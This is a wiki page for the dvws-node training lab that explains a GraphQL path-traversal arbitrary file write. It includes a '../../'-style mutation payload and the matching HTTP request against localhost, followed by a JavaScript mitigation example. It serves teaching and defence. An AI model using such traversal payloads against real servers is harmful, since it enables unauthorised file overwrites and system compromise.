GraphQL Arbitrary File Write - snoopysecurity/dvws-node GitHub Wiki

Introduction

Arbitrary File Write allows an attacker to use path traversal to reach files or directories outside the restricted directory and write to them.

Technical Details

The GraphQL endpoint listening on port 4000 exposes a mutation called updateUserUploadFile. Any authenticated user can call this mutation, and it can be used to traverse the file system and write to files.

  mutation {
    updateUserUploadFile(filePath: "../../../../../../tmp/test.txt", fileContent: "foo") {
      filePath
      fileContent
    }
  }

Example Request

POST /graphql HTTP/1.1
Host: localhost:4000
User-Agent: curl/7.58.0
Accept: */*
content-type: application/json
Content-Length: 184
Connection: close

{"query": "  mutation {\r\n  updateUserUploadFile(filePath: \"../../../../../../tmp/test.txt\",fileContent:\"foo\")\r\n  {\r\n\t\tfilePath,\r\n    fileContent\r\n  }\r\n  \r\n  \r\n}"}
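The mitigation side of the request above, as an added example that is not code from dvws-node: a path check a resolver could run on filePath before writing, shown next to the naive join that lets "../" escape. UPLOAD_ROOT and the function names naiveTarget, safeTarget and isAllowed are assumptions for illustration; the application's real upload directory is not given on this page.

```javascript
const path = require('path');

// Assumed upload root (hypothetical; not taken from the dvws-node source).
const UPLOAD_ROOT = path.resolve('/srv/app/uploads');

// Naive form: the client-supplied filePath is joined as-is, so "../"
// segments are normalised away and the result lands outside UPLOAD_ROOT.
function naiveTarget(filePath) {
  return path.join(UPLOAD_ROOT, filePath);
}

// Hardened form: resolve to an absolute path first, then require that the
// result is strictly inside UPLOAD_ROOT. Returns the absolute path or throws.
function safeTarget(filePath) {
  if (typeof filePath !== 'string' || filePath.length === 0 || filePath.includes('\0')) {
    throw new Error('invalid filePath');
  }
  // path.resolve also handles absolute input such as "/etc/passwd".
  const resolved = path.resolve(UPLOAD_ROOT, filePath);
  const rel = path.relative(UPLOAD_ROOT, resolved);
  const escapes =
    rel === '' ||                       // the root itself is not a file
    rel === '..' ||
    rel.startsWith('..' + path.sep) ||  // climbs above the root
    path.isAbsolute(rel);               // different drive on Windows
  if (escapes) {
    throw new Error('filePath escapes upload directory');
  }
  return resolved;
}

// Convenience wrapper for callers that only need a yes/no decision.
function isAllowed(filePath) {
  try {
    safeTarget(filePath);
    return true;
  } catch (err) {
    return false;
  }
}
```

The check is lexical only: if the upload tree can contain symbolic links, the parent directory should also be resolved with fs.realpath and compared against the real upload root before writing.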
